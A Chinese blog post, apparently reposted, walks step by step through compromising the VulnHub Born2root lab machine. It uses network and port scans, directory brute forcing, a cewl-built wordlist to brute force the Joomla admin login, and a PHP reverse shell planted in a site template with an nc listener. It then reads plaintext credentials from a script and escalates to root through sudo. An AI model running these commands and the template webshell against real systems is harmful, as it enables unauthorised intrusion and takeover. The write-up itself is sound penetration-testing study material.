vulnhub之Born2root的实践

admin 2025年1月28日02:32:04评论16 views字数 936阅读3分7秒阅读模式

本周实践的是vulnhub的Born2root镜像,

下载地址,https://download.vulnhub.com/born2root/Born2rootv2.ova,

用virtulbox导入成功,

做地址扫描,sudo netdiscover -r 192.168.31.0/24,

获取到靶机地址是192.168.31.162,

继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.31.162,

获取到靶机开放了80端口的http服务,
vulnhub之Born2root的实践
对http服务做路径暴破,dirb http://192.168.31.162,
获取到http://192.168.31.162/joomla,
vulnhub之Born2root的实践
浏览器访问http://192.168.31.162/joomla,获取到登录页面,
vulnhub之Born2root的实践
把登录页面里的文字转成密码字典,
cewl http://192.168.31.162/joomla > dict.txt,
上burpsuite对页面登录进行暴破,用admin做用户名,
vulnhub之Born2root的实践
导入上面制作的密码字典,
vulnhub之Born2root的实践
暴破获取到密码,travel,
vulnhub之Born2root的实践
用admin/travel登录,
vulnhub之Born2root的实践
点击进入administrator站点,
vulnhub之Born2root的实践
用admin/travel重新登录,找到可以替换反弹shell脚本的页面,
在kali攻击机上准备反弹shell脚本内容,
cat /usr/share/webshells/php/php-reverse-shell.php,
同时开启反弹shell监听,nc -lvp 4444,
把反弹shell脚本内容替换到靶机页面上去,并保存,
vulnhub之Born2root的实践
浏览器访问http://192.168.31.162/joomla/templates/beez3/index.php,获取到反弹shell,转成交互式shell,
python -c 'import pty;pty.spawn("/bin/bash")',
查看到fileshare.py和内容,获取到用户名密码tim/lulzlol,
vulnhub之Born2root的实践
切换账户,su tim,查看root权限程序,sudo -l,
发现此账户具有完全的sudo到root的权限,
切到root,sudo su,id确认没问题,
vulnhub之Born2root的实践

原文始发于微信公众号(真理的网络安全实践日记):vulnhub之Born2root的实践

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月28日02:32:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之Born2root的实践https://cn-sec.com/archives/3680677.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息